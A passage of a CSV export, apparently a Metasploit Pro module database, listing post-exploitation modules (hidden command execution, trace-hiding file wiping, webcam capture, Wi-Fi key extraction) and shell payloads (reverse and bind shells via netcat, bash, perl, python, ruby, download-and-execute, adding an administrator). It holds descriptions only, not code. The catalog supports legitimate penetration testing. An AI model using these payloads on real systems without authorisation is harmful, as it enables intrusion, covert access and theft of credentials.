00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/remove_host.rb","post","windows/manage/remove_host","post/windows/manage/remove_host","Windows Manage Host File Entry Removal",300,"This module allows the attacker to remove an entry from the Windows hosts file.","BSD License","f",,,,,"t",,"vt " 1989,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/rpcapd_start.rb","post","windows/manage/rpcapd_start","post/windows/manage/rpcapd_start","Windows Manage Remote Packet Capture Service Starter",300,"This module enables the Remote Packet Capture System (rpcapd service) included in the default installation of Winpcap. The module allows you to set up the service in passive or active mode (useful if the client is behind a firewall). If authentication is enabled you need a local user account to capture traffic. PORT will be used depending of the mode configured.","Metasploit Framework License (BSD)","f",,,,,"t",,"Borja Merino " 1990,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/run_as.rb","post","windows/manage/run_as","post/windows/manage/run_as","Windows Manage Run Command As User",300,"This module will login with the specified username/password and execute the supplied command as a hidden process. Output is not returned by default, by setting CMDOUT to false output will be redirected to a temp file and read back in to display.By setting advanced option SETPASS to true, it will reset the users password and then execute the command.","Metasploit Framework License (BSD)","f",,,,,"t",,"Kx499" 1991,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/sdel.rb","post","windows/manage/sdel","post/windows/manage/sdel","Windows Manage Safe Delete",300,"The goal of the module is to hinder the recovery of deleted files by overwriting its contents. This could be useful when you need to download some file on the victim machine and then delete it without leaving clues about its contents. Note that the script does not wipe the free disk space so temporary/sparse/encrypted/compressed files could not be overwritten. Note too that MTF entries are not overwritten so very small files could stay resident within the stream descriptor.","BSD License","f",,,,,"t",,"Borja Merino " 1992,"2013-05-29 16:42:01","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/smart_migrate.rb","post","windows/manage/smart_migrate","post/windows/manage/smart_migrate","Windows Manage Smart Process Migration",300,"This module will migrate a Meterpreter session. It will first attempt to migrate to winlogon.exe . If that fails it will then look at all of the explorer.exe processes. If there is one that exists for the user context the session is already in it will try that. Failing that it will fall back and try any other explorer.exe processes it finds","Metasploit Framework License (BSD)","f",,,,,"t",,"thelightcosine" 1993,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/vss_create.rb","post","windows/manage/vss_create","post/windows/manage/vss_create","Windows Manage Create Shadow Copy",300,"This module will attempt to create a new volume shadow copy. This is based on the VSSOwn Script originally posted by Tim Tomes and Mark Baggett. Works on win2k3 and later.","Metasploit Framework License (BSD)","f",,,,,"t","URL-http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html","theLightCosine " 1994,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/vss_list.rb","post","windows/manage/vss_list","post/windows/manage/vss_list","Windows Manage List Shadow Copies",300,"This module will attempt to list any Volume Shadow Copies on the system. This is based on the VSSOwn Script originally posted by Tim Tomes and Mark Baggett. Works on win2k3 and later.","Metasploit Framework License (BSD)","f",,,,,"t","URL-http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html","theLightCosine " 1995,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/vss_mount.rb","post","windows/manage/vss_mount","post/windows/manage/vss_mount","Windows Manage Mount Shadow Copy",300,"This module will attempt to mount a Volume Shadow Copy on the system. This is based on the VSSOwn Script originally posted by Tim Tomes and Mark Baggett. Works on win2k3 and later.","Metasploit Framework License (BSD)","f",,,,,"t","URL-http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html","theLightCosine " 1996,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/vss_set_storage.rb","post","windows/manage/vss_set_storage","post/windows/manage/vss_set_storage","Windows Manage Set Shadow Copy Storage Space",300,"This module will attempt to change the ammount of space for volume shadow copy storage. This is based on the VSSOwn Script originally posted by Tim Tomes and Mark Baggett. Works on win2k3 and later.","Metasploit Framework License (BSD)","f",,,,,"t","URL-http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html","theLightCosine " 1997,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/vss_storage.rb","post","windows/manage/vss_storage","post/windows/manage/vss_storage","Windows Manage Get Shadow Copy Storage Info",300,"This module will attempt to get volume shadow copy storage info. This is based on the VSSOwn Script originally posted by Tim Tomes and Mark Baggett. Works on win2k3 and later.","Metasploit Framework License (BSD)","f",,,,,"t","URL-http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html","theLightCosine " 1998,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/manage/webcam.rb","post","windows/manage/webcam","post/windows/manage/webcam","Windows Manage Webcam",300,"This module will allow the user to detect installed webcams (with the LIST action) or take a snapshot (with the SNAPSHOT) action.","Metasploit Framework License (BSD)","f",,,,,"t",,"sinn3r " 1999,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/recon/computer_browser_discovery.rb","post","windows/recon/computer_browser_discovery","post/windows/recon/computer_browser_discovery","Windows Recon Computer Browser Discovery",300,"This module uses railgun to discover hostnames and IPs on the network. LTYPE should be set to one of the following values: WK (all workstations), SVR (all servers), SQL (all SQL servers), DC (all Domain Controllers), DCBKUP (all Domain Backup Servers), NOVELL (all Novell servers), PRINTSVR (all Print Que servers), MASTERBROWSER (all Master Browswers), WINDOWS (all Windows hosts), or UNIX (all Unix hosts).","Metasploit Framework License (BSD)","f",,,,,"t",,"mubix " 2000,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/recon/resolve_hostname.rb","post","windows/recon/resolve_hostname","post/windows/recon/resolve_hostname","Windows Recon Resolve Hostname",300,"This module resolves a hostname to IP address via the victim, similiar to the Unix dig command","Metasploit Framework License (BSD)","f",,,,,"t",,"mubix " 2001,"2013-05-23 08:20:18","/opt/metasploit/apps/pro/msf3/modules/post/windows/recon/resolve_ip.rb","post","windows/recon/resolve_ip","post/windows/recon/resolve_ip","Windows Recon Resolve IP",300,"This module reverse resolves a range or IP to a hostname","Metasploit Framework License (BSD)","f",,,,,"t",,"mubix " 2002,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/wlan/wlan_bss_list.rb","post","windows/wlan/wlan_bss_list","post/windows/wlan/wlan_bss_list","Windows Gather Wireless BSS Info",300,"This module gathers information about the wireless Basic Service Sets available to the victim machine.","Metasploit Framework License (BSD)","f",,,,,"t",,"theLightCosine " 2003,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/wlan/wlan_current_connection.rb","post","windows/wlan/wlan_current_connection","post/windows/wlan/wlan_current_connection","Windows Gather Wireless Current Connection Info",300,"This module gathers information about the current connection on each wireless lan interface on the target machine.","Metasploit Framework License (BSD)","f",,,,,"t",,"theLightCosine " 2004,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/wlan/wlan_disconnect.rb","post","windows/wlan/wlan_disconnect","post/windows/wlan/wlan_disconnect","Windows Disconnect Wireless Connection",300,"This module disconnects the current wireless network connection on the specified interface.","Metasploit Framework License (BSD)","f",,,,,"t",,"theLightCosine " 2005,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/wlan/wlan_profile.rb","post","windows/wlan/wlan_profile","post/windows/wlan/wlan_profile","Windows Gather Wireless Profile",300,"This module extracts saved Wireless LAN profiles. It will also try to decrypt the network key material. Behaviour is slightly different bewteen OS versions when it comes to WPA. In Windows Vista/7 we will get the passphrase. In Windows XP we will get the PBKDF2 derived key.","Metasploit Framework License (BSD)","f",,,,,"t",,"theLightCosine " 2006,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb","payload","aix/ppc/shell_bind_tcp","payload/aix/ppc/shell_bind_tcp","AIX Command Shell, Bind TCP Inline",300,"Listen for a connection and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"Ramon de C Valle " 2007,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/aix/ppc/shell_find_port.rb","payload","aix/ppc/shell_find_port","payload/aix/ppc/shell_find_port","AIX Command Shell, Find Port Inline",300,"Spawn a shell on an established connection","Metasploit Framework License (BSD)","f",,,,,"t",,"Ramon de C Valle " 2008,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/aix/ppc/shell_interact.rb","payload","aix/ppc/shell_interact","payload/aix/ppc/shell_interact","AIX execve shell for inetd",300,"Simply execve /bin/sh (for inetd programs)","Metasploit Framework License (BSD)","f",,,,,"t",,"jduck " 2009,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb","payload","aix/ppc/shell_reverse_tcp","payload/aix/ppc/shell_reverse_tcp","AIX Command Shell, Reverse TCP Inline",300,"Connect back to attacker and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"Ramon de C Valle " 2010,"2013-05-29 16:42:01","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/android/reverse_tcp.rb","payload","android/meterpreter/reverse_tcp","payload/android/meterpreter/reverse_tcp","Android Meterpreter, Dalvik Reverse TCP Stager",300,"Connect back stager, Run a meterpreter server on Android","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"egypt , mihi, timwr" 2011,"2013-05-29 16:42:01","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/android/reverse_tcp.rb","payload","android/shell/reverse_tcp","payload/android/shell/reverse_tcp","Command Shell, Dalvik Reverse TCP Stager",300,"Connect back stager, Spawn a piped command shell (sh)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"egypt , mihi, timwr" 2012,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb","payload","bsd/sparc/shell_bind_tcp","payload/bsd/sparc/shell_bind_tcp","BSD Command Shell, Bind TCP Inline",300,"Listen for a connection and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"vlad902 " 2013,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb","payload","bsd/sparc/shell_reverse_tcp","payload/bsd/sparc/shell_reverse_tcp","BSD Command Shell, Reverse TCP Inline",300,"Connect back to attacker and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"vlad902 " 2014,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/bsd/x86/exec.rb","payload","bsd/x86/exec","payload/bsd/x86/exec","BSD Execute Command",300,"Execute an arbitrary command","Metasploit Framework License (BSD)","f",,,,,"t",,"vlad902 " 2015,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/bsd/x86/metsvc_bind_tcp.rb","payload","bsd/x86/metsvc_bind_tcp","payload/bsd/x86/metsvc_bind_tcp","FreeBSD Meterpreter Service, Bind TCP",300,"Stub payload for interacting with a Meterpreter Service","BSD License","f",,,,,"t",,"hdm " 2016,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/bsd/x86/metsvc_reverse_tcp.rb","payload","bsd/x86/metsvc_reverse_tcp","payload/bsd/x86/metsvc_reverse_tcp","FreeBSD Meterpreter Service, Reverse TCP Inline",300,"Stub payload for interacting with a Meterpreter Service","BSD License","f",,,,,"t",,"hdm " 2017,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb","payload","bsd/x86/shell/bind_ipv6_tcp","payload/bsd/x86/shell/bind_ipv6_tcp","BSD Command Shell, Bind TCP Stager (IPv6)",300,"Listen for a connection over IPv6, Spawn a command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , skape , vlad902 " 2018,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/bsd/x86/bind_tcp.rb","payload","bsd/x86/shell/bind_tcp","payload/bsd/x86/shell/bind_tcp","BSD Command Shell, Bind TCP Stager",300,"Listen for a connection, Spawn a command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"skape " 2019,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/bsd/x86/find_tag.rb","payload","bsd/x86/shell/find_tag","payload/bsd/x86/shell/find_tag","BSD Command Shell, Find Tag Stager",300,"Use an established connection, Spawn a command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"skape " 2020,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb","payload","bsd/x86/shell/reverse_ipv6_tcp","payload/bsd/x86/shell/reverse_ipv6_tcp","BSD Command Shell, Reverse TCP Stager (IPv6)",300,"Connect back to the attacker over IPv6, Spawn a command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"hdm , skape , vlad902 " 2021,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/bsd/x86/reverse_tcp.rb","payload","bsd/x86/shell/reverse_tcp","payload/bsd/x86/shell/reverse_tcp","BSD Command Shell, Reverse TCP Stager",300,"Connect back to the attacker, Spawn a command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"skape " 2022,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/bsd/x86/shell_bind_tcp.rb","payload","bsd/x86/shell_bind_tcp","payload/bsd/x86/shell_bind_tcp","BSD Command Shell, Bind TCP Inline",300,"Listen for a connection and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"Ramon de C Valle " 2023,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb","payload","bsd/x86/shell_bind_tcp_ipv6","payload/bsd/x86/shell_bind_tcp_ipv6","BSD Command Shell, Bind TCP Inline (IPv6)",300,"Listen for a connection and spawn a command shell over IPv6","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm , skape , vlad902 " 2024,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/bsd/x86/shell_find_port.rb","payload","bsd/x86/shell_find_port","payload/bsd/x86/shell_find_port","BSD Command Shell, Find Port Inline",300,"Spawn a shell on an established connection","Metasploit Framework License (BSD)","f",,,,,"t",,"Ramon de C Valle " 2025,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/bsd/x86/shell_find_tag.rb","payload","bsd/x86/shell_find_tag","payload/bsd/x86/shell_find_tag","BSD Command Shell, Find Tag Inline",300,"Spawn a shell on an established connection (proxy/nat safe)","Metasploit Framework License (BSD)","f",,,,,"t",,"skape " 2026,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/bsd/x86/shell_reverse_tcp.rb","payload","bsd/x86/shell_reverse_tcp","payload/bsd/x86/shell_reverse_tcp","BSD Command Shell, Reverse TCP Inline",300,"Connect back to attacker and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"Ramon de C Valle " 2027,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb","payload","bsd/x86/shell_reverse_tcp_ipv6","payload/bsd/x86/shell_reverse_tcp_ipv6","BSD Command Shell, Reverse TCP Inline (IPv6)",300,"Connect back to attacker and spawn a command shell over IPv6","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm , skape , vlad902 " 2028,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/bsdi/x86/bind_tcp.rb","payload","bsdi/x86/shell/bind_tcp","payload/bsdi/x86/shell/bind_tcp","BSDi Command Shell, Bind TCP Stager",300,"Listen for a connection, Spawn a command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"skape " 2029,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/bsdi/x86/reverse_tcp.rb","payload","bsdi/x86/shell/reverse_tcp","payload/bsdi/x86/shell/reverse_tcp","BSDi Command Shell, Reverse TCP Stager",300,"Connect back to the attacker, Spawn a command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"skape " 2030,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/bsdi/x86/shell_bind_tcp.rb","payload","bsdi/x86/shell_bind_tcp","payload/bsdi/x86/shell_bind_tcp","BSDi Command Shell, Bind TCP Inline",300,"Listen for a connection and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"optyx , skape " 2031,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/bsdi/x86/shell_find_port.rb","payload","bsdi/x86/shell_find_port","payload/bsdi/x86/shell_find_port","BSDi Command Shell, Find Port Inline",300,"Spawn a shell on an established connection","Metasploit Framework License (BSD)","f",,,,,"t",,"optyx , skape " 2032,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/bsdi/x86/shell_reverse_tcp.rb","payload","bsdi/x86/shell_reverse_tcp","payload/bsdi/x86/shell_reverse_tcp","BSDi Command Shell, Reverse TCP Inline",300,"Connect back to attacker and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"optyx , skape " 2033,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/unix/bind_inetd.rb","payload","cmd/unix/bind_inetd","payload/cmd/unix/bind_inetd","Unix Command Shell, Bind TCP (inetd)",300,"Listen for a connection and spawn a command shell (persistent)","Metasploit Framework License (BSD)","t",,,,,"t",,"hdm " 2034,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/unix/bind_netcat.rb","payload","cmd/unix/bind_netcat","payload/cmd/unix/bind_netcat","Unix Command Shell, Bind TCP (via netcat)",300,"Listen for a connection and spawn a command shell via netcat","Metasploit Framework License (BSD)","f",,,,,"t",,"egypt , juan vazquez , m-1-k-3" 2035,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/unix/bind_netcat_gaping.rb","payload","cmd/unix/bind_netcat_gaping","payload/cmd/unix/bind_netcat_gaping","Unix Command Shell, Bind TCP (via netcat -e)",300,"Listen for a connection and spawn a command shell via netcat","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm " 2036,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/unix/bind_netcat_gaping_ipv6.rb","payload","cmd/unix/bind_netcat_gaping_ipv6","payload/cmd/unix/bind_netcat_gaping_ipv6","Unix Command Shell, Bind TCP (via netcat -e) IPv6",300,"Listen for a connection and spawn a command shell via netcat","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm " 2037,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/unix/bind_perl.rb","payload","cmd/unix/bind_perl","payload/cmd/unix/bind_perl","Unix Command Shell, Bind TCP (via Perl)",300,"Listen for a connection and spawn a command shell via perl","BSD License","f",,,,,"t",,"Samy , cazz " 2038,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb","payload","cmd/unix/bind_perl_ipv6","payload/cmd/unix/bind_perl_ipv6","Unix Command Shell, Bind TCP (via perl) IPv6",300,"Listen for a connection and spawn a command shell via perl","BSD License","f",,,,,"t",,"Samy , cazz " 2039,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/unix/bind_ruby.rb","payload","cmd/unix/bind_ruby","payload/cmd/unix/bind_ruby","Unix Command Shell, Bind TCP (via Ruby)",300,"Continually listen for a connection and spawn a command shell via Ruby","Metasploit Framework License (BSD)","f",,,,,"t",,"kris katterjohn " 2040,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/unix/bind_ruby_ipv6.rb","payload","cmd/unix/bind_ruby_ipv6","payload/cmd/unix/bind_ruby_ipv6","Unix Command Shell, Bind TCP (via Ruby) IPv6",300,"Continually listen for a connection and spawn a command shell via Ruby","Metasploit Framework License (BSD)","f",,,,,"t",,"kris katterjohn " 2041,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/unix/generic.rb","payload","cmd/unix/generic","payload/cmd/unix/generic","Unix Command, Generic Command Execution",300,"Executes the supplied command","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm " 2042,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/unix/interact.rb","payload","cmd/unix/interact","payload/cmd/unix/interact","Unix Command, Interact with Established Connection",300,"Interacts with a shell on an established socket connection","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm " 2043,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/unix/reverse.rb","payload","cmd/unix/reverse","payload/cmd/unix/reverse","Unix Command Shell, Double reverse TCP (telnet)",300,"Creates an interactive shell through two inbound connections","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm " 2044,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/unix/reverse_bash.rb","payload","cmd/unix/reverse_bash","payload/cmd/unix/reverse_bash","Unix Command Shell, Reverse TCP (/dev/tcp)",300,"Creates an interactive shell via bash's builtin /dev/tcp. This will not work on most Debian-based Linux distributions (including Ubuntu) because they compile bash without the /dev/tcp feature.","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm " 2045,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/unix/reverse_bash_telnet_ssl.rb","payload","cmd/unix/reverse_bash_telnet_ssl","payload/cmd/unix/reverse_bash_telnet_ssl","Unix Command Shell, Reverse TCP SSL (telnet)",300,"Creates an interactive shell via mknod and telnet. This method works on Debian and other systems compiled without /dev/tcp support. This module uses the '-z' option included on some systems to encrypt using SSL.","Metasploit Framework License (BSD)","f",,,,,"t",,"RageLtMan" 2046,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/unix/reverse_netcat.rb","payload","cmd/unix/reverse_netcat","payload/cmd/unix/reverse_netcat","Unix Command Shell, Reverse TCP (via netcat)",300,"Creates an interactive shell via netcat","Metasploit Framework License (BSD)","f",,,,,"t",,"egypt , juan vazquez , m-1-k-3" 2047,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb","payload","cmd/unix/reverse_netcat_gaping","payload/cmd/unix/reverse_netcat_gaping","Unix Command Shell, Reverse TCP (via netcat -e)",300,"Creates an interactive shell via netcat","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm " 2048,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/unix/reverse_openssl.rb","payload","cmd/unix/reverse_openssl","payload/cmd/unix/reverse_openssl","Unix Command Shell, Double reverse TCP SSL (openssl)",300,"Creates an interactive shell through two inbound connections","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm " 2049,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/unix/reverse_perl.rb","payload","cmd/unix/reverse_perl","payload/cmd/unix/reverse_perl","Unix Command Shell, Reverse TCP (via Perl)",300,"Creates an interactive shell via perl","BSD License","f",,,,,"t",,"cazz " 2050,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb","payload","cmd/unix/reverse_perl_ssl","payload/cmd/unix/reverse_perl_ssl","Unix Command Shell, Reverse TCP SSL (via perl)",300,"Creates an interactive shell via perl, uses SSL","BSD License","f",,,,,"t",,"RageLtMan" 2051,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb","payload","cmd/unix/reverse_php_ssl","payload/cmd/unix/reverse_php_ssl","Unix Command Shell, Reverse TCP SSL (via php)",300,"Creates an interactive shell via php, uses SSL","BSD License","f",,,,,"t",,"RageLtMan" 2052,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/unix/reverse_python.rb","payload","cmd/unix/reverse_python","payload/cmd/unix/reverse_python","Unix Command Shell, Reverse TCP (via Python)",300,"Connect back and create a command shell via Python","Metasploit Framework License (BSD)","f",,,,,"t",,"Brendan Coles " 2053,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb","payload","cmd/unix/reverse_python_ssl","payload/cmd/unix/reverse_python_ssl","Unix Command Shell, Reverse TCP SSL (via python)",300,"Creates an interactive shell via python, uses SSL, encodes with base64 by design.","BSD License","f",,,,,"t",,"RageLtMan" 2054,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/unix/reverse_ruby.rb","payload","cmd/unix/reverse_ruby","payload/cmd/unix/reverse_ruby","Unix Command Shell, Reverse TCP (via Ruby)",300,"Connect back and create a command shell via Ruby","Metasploit Framework License (BSD)","f",,,,,"t",,"kris katterjohn " 2055,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb","payload","cmd/unix/reverse_ruby_ssl","payload/cmd/unix/reverse_ruby_ssl","Unix Command Shell, Reverse TCP SSL (via Ruby)",300,"Connect back and create a command shell via Ruby, uses SSL","Metasploit Framework License (BSD)","f",,,,,"t",,"RageLtMan" 2056,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb","payload","cmd/unix/reverse_ssl_double_telnet","payload/cmd/unix/reverse_ssl_double_telnet","Unix Command Shell, Double Reverse TCP SSL (telnet)",300,"Creates an interactive shell through two inbound connections, encrypts using SSL via ""-z"" option","Metasploit Framework License (BSD)","f",,,,,"t",,"RageLtMan, hdm " 2057,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/windows/adduser.rb","payload","cmd/windows/adduser","payload/cmd/windows/adduser","Windows Execute net user /ADD CMD",300,"Create a new user and add them to local administration group. Note: The specified password is checked for common complexity requirements to prevent the target machine rejecting the user for failing to meet policy requirements. Complexity check: 8-14 chars (1 UPPER, 1 lower, 1 digit/special)","Metasploit Framework License (BSD)","f",,,,,"t",,"Chris John Riley, hdm , scriptjunkie" 2058,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/windows/bind_perl.rb","payload","cmd/windows/bind_perl","payload/cmd/windows/bind_perl","Windows Command Shell, Bind TCP (via Perl)",300,"Listen for a connection and spawn a command shell via perl (persistent)","BSD License","f",,,,,"t",,"Samy , cazz , patrick " 2059,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb","payload","cmd/windows/bind_perl_ipv6","payload/cmd/windows/bind_perl_ipv6","Windows Command Shell, Bind TCP (via perl) IPv6",300,"Listen for a connection and spawn a command shell via perl (persistent)","BSD License","f",,,,,"t",,"Samy , cazz , patrick " 2060,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/windows/bind_ruby.rb","payload","cmd/windows/bind_ruby","payload/cmd/windows/bind_ruby","Windows Command Shell, Bind TCP (via Ruby)",300,"Continually listen for a connection and spawn a command shell via Ruby","Metasploit Framework License (BSD)","f",,,,,"t",,"kris katterjohn " 2061,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/windows/download_eval_vbs.rb","payload","cmd/windows/download_eval_vbs","payload/cmd/windows/download_eval_vbs","Windows Executable Download and Evaluate VBS",300,"Downloads a file from an HTTP(S) URL and executes it as a vbs script. Use it to stage a vbs encoded payload from a short command line.","BSD License","f",,,,,"t",,"scriptjunkie" 2062,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/windows/download_exec_vbs.rb","payload","cmd/windows/download_exec_vbs","payload/cmd/windows/download_exec_vbs","Windows Executable Download and Execute (via .vbs)",300,"Download an EXE from an HTTP(S) URL and execute it","BSD License","f",,,,,"t",,"scriptjunkie" 2063,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/windows/reverse_perl.rb","payload","cmd/windows/reverse_perl","payload/cmd/windows/reverse_perl","Windows Command, Double reverse TCP connection (via Perl)",300,"Creates an interactive shell via perl","BSD License","f",,,,,"t",,"cazz , patrick " 2064,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/cmd/windows/reverse_ruby.rb","payload","cmd/windows/reverse_ruby","payload/cmd/windows/reverse_ruby","Windows Command Shell, Reverse TCP (via Ruby)",300,"Connect back and create a command shell via Ruby","Metasploit Framework License (BSD)","f",,,,,"t",,"kris katterjohn " 2065,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/generic/custom.rb","payload","generic/custom","payload/generic/custom","Custom Payload",300,"Use custom string or file as payload. Set either PAYLOADFILE or PAYLOADSTR.","Metasploit Framework License (BSD)","f",,,,,"t",,"scriptjunkie " 2066,"2013-05-07 